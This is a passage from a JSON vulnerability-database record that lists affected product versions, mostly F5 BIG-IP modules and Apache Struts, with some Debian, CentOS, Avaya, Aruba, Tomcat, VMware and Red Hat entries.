            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.40"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip asm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics 11.0.0-hf2",
            "scope": null,
            "trust": 0.3,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0.0"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip afm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "centos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "centos",
            "version": "6"
          },
          {
            "_id": null,
            "model": "ip office server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ip office application server sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.02"
          },
          {
            "_id": null,
            "model": "ip office application server sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.01"
          },
          {
            "_id": null,
            "model": "ip office application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "aura conferencing standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "aura conferencing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tomcat 8.0.0-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "20"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.41"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.11"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.14"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.12"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.7"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.12"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.13"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "vcenter server update",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.52"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.8.2"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.7.3"
          },
          {
            "_id": null,
            "model": "jboss fuse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "jboss a-mq",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "urbancode release",
